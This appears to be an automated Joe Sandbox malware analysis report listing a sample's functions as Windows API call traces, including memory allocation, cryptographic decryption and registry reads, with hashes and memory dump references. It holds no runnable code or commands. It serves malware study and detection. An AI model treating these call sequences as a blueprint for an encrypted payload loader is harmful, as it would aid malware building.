                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                          • String ID: pigalicapi
                                                                                                                                                                                                                                                          • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                          • Opcode ID: 0116a87af2037233898091d45b8ca657d377751062a76b2a9c4fc13aa1dd02d6
                                                                                                                                                                                                                                                          • Instruction ID: 626974810f2e123eab0a29fa5855df3afb3e234bdd6e4c3840cdbcbbaccc3994
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0116a87af2037233898091d45b8ca657d377751062a76b2a9c4fc13aa1dd02d6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97C08C362C83186BE2101A63ED4BF493E8C9710F81F601029F10AC50E0C9A160608B16
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000004,-->), ref: 013F8300
                                                                                                                                                                                                                                                            • Part of subcall function 013F8090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F80D8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                          • String ID: -->$<!--
                                                                                                                                                                                                                                                          • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                          • Opcode ID: 2b8cbf8edb03a57aa4ee6142f3c637302810cfa38622a9ca289de6f4a23b7020
                                                                                                                                                                                                                                                          • Instruction ID: 025796c0e27c0dd94049f1b31cf8fbcfaf0697a8349e7d31b1f2557096c180b4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b8cbf8edb03a57aa4ee6142f3c637302810cfa38622a9ca289de6f4a23b7020
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3317E7490024EDFDF09CF98C544BEEBBB5EB48308F14849ED605BB261D7709A44CB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 013FA45C
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 013FA480
                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 013FA494
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                                                          • Opcode ID: 9049822e86d532fda277b8e53de5a537f33ecd6451cd257e9e5a5c63081bd039
                                                                                                                                                                                                                                                          • Instruction ID: 4079f9ee74f16bd1d379595ae79721f5400cbc9032bfcc3a358f5809357e8f25
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9049822e86d532fda277b8e53de5a537f33ecd6451cd257e9e5a5c63081bd039
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57111F74A04209EBEB25CF99C848BEE7BB8FB48704F14855CEA14A7380D7B4DA51CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0050C807
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050C840
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0050C847
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2716640707-0
                                                                                                                                                                                                                                                          • Opcode ID: 35594345d520f30934bb81b7b7583427d504981939231db45f57dcba34544786
                                                                                                                                                                                                                                                          • Instruction ID: 13f92dfde926c619ab9d414e82e831d9bca1df507018806c3b3f8d3f45bb3c7e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35594345d520f30934bb81b7b7583427d504981939231db45f57dcba34544786
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81E02B3B50451736D22233297C8DDAF2E0DFFD37B07154129F904821C2EE108C0691F9
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F80D8
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013F8240
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F8AD3
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: GetLastError.KERNEL32 ref: 013F8ADD
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F8B0C
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 013F8B37
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 013F8B5E
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 013F8B7A
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 013F8B87
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 013F8B91
                                                                                                                                                                                                                                                            • Part of subcall function 013F8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F8B9D
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 013F81F1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 142027497-0
                                                                                                                                                                                                                                                          • Opcode ID: 7bff8c8c82bd6cdbcdcc1bf8f2d0c023968f114214a228905abaf7368d9b1a9c
                                                                                                                                                                                                                                                          • Instruction ID: 677bedafc5e27ea190121e74b317c5a3580af81e05f506c75e2a62963873e516
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bff8c8c82bd6cdbcdcc1bf8f2d0c023968f114214a228905abaf7368d9b1a9c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6551E8B4E00209AFDB18DF98D994FAEB7B5FB48308F14815DEA05B7381D770AA45CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Info
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: a40d99e35269373535ea4d24d5f692cb41442df71846f6313ac9216566929baf
                                                                                                                                                                                                                                                          • Instruction ID: 36ba36403a24c19d38580f4438ec6dfe21d340d13afee9d128de1e6498ce4612
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a40d99e35269373535ea4d24d5f692cb41442df71846f6313ac9216566929baf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8411C7050829C9ADF218E248D99EFEBFB9FB45304F1804DCD5DA87183D635AA45DF60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CharUpperA.USER32(00000000), ref: 013F59E2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyz, xrefs: 013F597E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CharUpper
                                                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                          • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                          • Opcode ID: 45c8f0f2165fb64d457a8dcee64f379f47dc1dc5e70f58d97ac85fa270016c26
                                                                                                                                                                                                                                                          • Instruction ID: cf956419bf7f97bf5880e54ae205332993bc0539b8f0d83f9ef1e7e3454292ed
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45c8f0f2165fb64d457a8dcee64f379f47dc1dc5e70f58d97ac85fa270016c26
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67213A3190210CEBDF09CF98D584BEEBBB6FF86319F208559E904AB341D3759A45CB40
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,005062C1,00000000,?,00506A99,00000001,00000364,?,005062C1,00505E2D), ref: 005073A0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID: -^P
                                                                                                                                                                                                                                                          • API String ID: 1279760036-2156342671
                                                                                                                                                                                                                                                          • Opcode ID: 570c5ac653e7fa119153f526a951c1335fe75d1cdc022aa33751bbfef78f40c9
                                                                                                                                                                                                                                                          • Instruction ID: 29d35a34f4a1341a004bb49c8cf60ff346c51e2f91c88a38b5afa3ef8456eaa2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 570c5ac653e7fa119153f526a951c1335fe75d1cdc022aa33751bbfef78f40c9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0BB3590852DA7FB216A619C0ABEF3F49BF89760B145911AC44D61D0CA30F800A6E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00507EB2: GetOEMCP.KERNEL32 ref: 00507EDD
                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00508180,?,00000000), ref: 00508353
                                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00508180,?,?,?,00508180,?,00000000), ref: 00508366
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                                                                                                          • Opcode ID: 43ed4764bc1cee0ba76f223b89e9c163f11d040f57a45a323cb54cfc0ea8a6ef
                                                                                                                                                                                                                                                          • Instruction ID: da787838789b17f30568ad4237f62a1c534b6eee7b353a701dd94b45f59243cf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43ed4764bc1cee0ba76f223b89e9c163f11d040f57a45a323cb54cfc0ea8a6ef
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B5124709042069EDB20CF31C884AFEBFA5FF85714F1888AED4D68B2D1DA359946CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F8BFF
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: GetLastError.KERNEL32 ref: 013F8C09
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F8C38
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 013F8C59
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 013F8C71
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 013F8C99
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 013F8CC1
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 013F8CD5
                                                                                                                                                                                                                                                            • Part of subcall function 013F8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F8CE1
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 013F9513
                                                                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 013F9521
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2710640451-0
                                                                                                                                                                                                                                                          • Opcode ID: 473b2414e3c6feb87ad512e88c2f7843df5d3f0721bccda79eb53cd4f97f39c0
                                                                                                                                                                                                                                                          • Instruction ID: 920d3bdd3c1af667fbd5bf0c5141710eedf97e56651e008906f4c4379d0346a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 473b2414e3c6feb87ad512e88c2f7843df5d3f0721bccda79eb53cd4f97f39c0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8411CB1D0020DEFDB04DFD8C895FEEBBB9EF58308F508159E615AB285D634A645CB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 005069E4: GetLastError.KERNEL32 ref: 005069E8
                                                                                                                                                                                                                                                            • Part of subcall function 005069E4: _free.LIBCMT ref: 00506A1B
                                                                                                                                                                                                                                                            • Part of subcall function 005069E4: SetLastError.KERNEL32(00000000), ref: 00506A5C
                                                                                                                                                                                                                                                            • Part of subcall function 005069E4: _abort.LIBCMT ref: 00506A62
                                                                                                                                                                                                                                                            • Part of subcall function 0050823D: _abort.LIBCMT ref: 0050826F
                                                                                                                                                                                                                                                            • Part of subcall function 0050823D: _free.LIBCMT ref: 005082A3
                                                                                                                                                                                                                                                            • Part of subcall function 00507EB2: GetOEMCP.KERNEL32 ref: 00507EDD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00508196
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005081CC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2991157371-0
                                                                                                                                                                                                                                                          • Opcode ID: f3bf0ee96b2cb7a37203393e476773d8970bb2ad33459134795f5ad38519eda6
                                                                                                                                                                                                                                                          • Instruction ID: 90a5041ab675c214089be0e6b6c4e7588d62633852ed16c1f5a9fe7e87a0adab
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3bf0ee96b2cb7a37203393e476773d8970bb2ad33459134795f5ad38519eda6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D231D331908209AFDB11DBA8D845FADBFE5FF84324F210099E9549B2E1EF319D41DB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 013F4C19
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 013F4C49
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 013F4C60
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 013F4C77
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 013F56F0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual$ObjectSingleUninitializeWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2825510553-0
                                                                                                                                                                                                                                                          • Opcode ID: 9076a2b510bfdf2d8d4d10f68722dacc5ebc6755655683d064ee3496081a03ee
                                                                                                                                                                                                                                                          • Instruction ID: cad105b622cbb3d77a9bd95148f8d4f559d3ff60a99dad43ad8b0f3f389fb9ec
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9076a2b510bfdf2d8d4d10f68722dacc5ebc6755655683d064ee3496081a03ee
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6E06D31B40209AFCB10CFA4D890AAEBFF4EF48329F14624DDA01E6201E630E991CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,013F9FB2,?,013F9FB2,00000000,?,?,?,013F9E2D), ref: 013F97A9
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,013F9FB2,00000000,?,?,?,013F9E2D), ref: 013F97B0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                                                          • Opcode ID: 28f16f7c6abbfb71e095a531a2127d742fe940022ac04f0de906d762dca2a8d0
                                                                                                                                                                                                                                                          • Instruction ID: 49aa15a66caf42b4cab2825aecebfa3c0f938395112981bde2fd6d70d556e92a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28f16f7c6abbfb71e095a531a2127d742fe940022ac04f0de906d762dca2a8d0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1C09B7118030DABD6509BD8E80DD95375DE749705F005005B70DC6244CA70E5454762
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 0050735F: RtlAllocateHeap.NTDLL(00000008,005062C1,00000000,?,00506A99,00000001,00000364,?,005062C1,00505E2D), ref: 005073A0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050C8BF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                                                                                                          • Opcode ID: 801be9e56227785b6449ea9febabb7cb39a789cae8e42810a6ad1fd83e2ba0bf
                                                                                                                                                                                                                                                          • Instruction ID: df7bf6f50b03c8685b646bc9e8bcf3fb3fcc93d736ca573e79ab78acf9059bcc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 801be9e56227785b6449ea9febabb7cb39a789cae8e42810a6ad1fd83e2ba0bf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC01DB725043095BE3218F65984599EFFD9FF8A370F25061DE594532C0FA30A805C778
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,0050815B,00000220), ref: 005092A5
